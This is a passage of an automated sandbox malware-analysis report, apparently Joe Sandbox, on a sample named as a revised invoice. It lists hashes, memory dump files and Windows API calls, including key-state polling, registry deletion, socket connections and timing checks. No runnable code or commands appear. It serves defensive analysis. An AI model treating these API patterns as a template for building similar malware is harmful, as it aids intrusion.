                              • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                              • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                              • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                              APIs
                              • GetCursorPos.USER32(?), ref: 004563A6
                              • ScreenToClient.USER32(?,?), ref: 004563C3
                              • GetAsyncKeyState.USER32(?), ref: 00456400
                              • GetAsyncKeyState.USER32(?), ref: 00456410
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: AsyncState$ClientCursorLongScreenWindow
                              • String ID:
                              • API String ID: 3539004672-0
                              • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                              • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                              • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                              • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                              APIs
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                              • Sleep.KERNEL32(0000000A), ref: 0047D455
                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Interlocked$DecrementIncrement$Sleep
                              • String ID:
                              • API String ID: 327565842-0
                              • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                              • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                              • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                              • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                              APIs
                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: PrivateProfile$SectionWrite$String
                              • String ID:
                              • API String ID: 2832842796-0
                              • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                              • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                              • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                              • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                              APIs
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                              • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Enum$CloseDeleteOpen
                              • String ID:
                              • API String ID: 2095303065-0
                              • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                              • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                              • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                              • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00436A24
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: RectWindow
                              • String ID:
                              • API String ID: 861336768-0
                              • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                              • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                              • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                              • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                              APIs
                              • SendMessageW.USER32 ref: 00449598
                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                              • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                              • _wcslen.LIBCMT ref: 0044960D
                              • _wcslen.LIBCMT ref: 0044961A
                              • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$_wcslen$_wcspbrk
                              • String ID:
                              • API String ID: 1856069659-0
                              • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                              • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                              • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                              • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                              APIs
                              • GetCursorPos.USER32(?), ref: 004478E2
                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                              • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                              • GetCursorPos.USER32(00000000), ref: 0044796A
                              • TrackPopupMenuEx.USER32(02FE6400,00000000,00000000,?,?,00000000), ref: 00447991
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CursorMenuPopupTrack$Proc
                              • String ID:
                              • API String ID: 1300944170-0
                              • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                              • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                              • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                              • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004479CC
                              • GetCursorPos.USER32(?), ref: 004479D7
                              • ScreenToClient.USER32(?,?), ref: 004479F3
                              • WindowFromPoint.USER32(?,?), ref: 00447A34
                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Client$CursorFromPointProcRectScreenWindow
                              • String ID:
                              • API String ID: 1822080540-0
                              • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                              • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                              • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                              • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                              • EndPaint.USER32(?,?), ref: 00447D13
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                              • String ID:
                              • API String ID: 659298297-0
                              • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                              • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                              • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                              • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                              APIs
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                • Part of subcall function 00440D98: SendMessageW.USER32(02FE1AC0,000000F1,00000000,00000000), ref: 00440E6E
                                • Part of subcall function 00440D98: SendMessageW.USER32(02FE1AC0,000000F1,00000001,00000000), ref: 00440E9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$EnableMessageSend$LongShow
                              • String ID:
                              • API String ID: 142311417-0
                              • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                              • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                              • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                              • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                              • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                              • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                              • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                              APIs
                              • IsWindowVisible.USER32(?), ref: 00445879
                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                              • _wcslen.LIBCMT ref: 004458FB
                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                              • String ID:
                              • API String ID: 3087257052-0
                              • Opcode ID: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                              • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                              • Opcode Fuzzy Hash: 622372a4a32610ce73fb3647056b26e365a1681bd10d6cc102ac189a3bd4553b
                              • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                              APIs
                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                              • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                              • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                              • String ID:
                              • API String ID: 245547762-0
                              • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                              • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                              • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                              • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 004471D8
                              • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • SelectObject.GDI32(?,00000000), ref: 00447228
                              • BeginPath.GDI32(?), ref: 0044723D
                              • SelectObject.GDI32(?,00000000), ref: 00447266
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Object$Select$BeginCreateDeletePath
                              • String ID:
                              • API String ID: 2338827641-0
                              • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                              • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                              • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                              • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00434598
                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                              • Sleep.KERNEL32(00000000), ref: 004345D4
                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CounterPerformanceQuerySleep
                              • String ID:
                              • API String ID: 2875609808-0
                              • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                              • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                              • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                              • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                              APIs
                              • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                              • MessageBeep.USER32(00000000), ref: 00460C46
                              • KillTimer.USER32(?,0000040A), ref: 00460C68
                              • EndDialog.USER32(?,00000001), ref: 00460C83
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
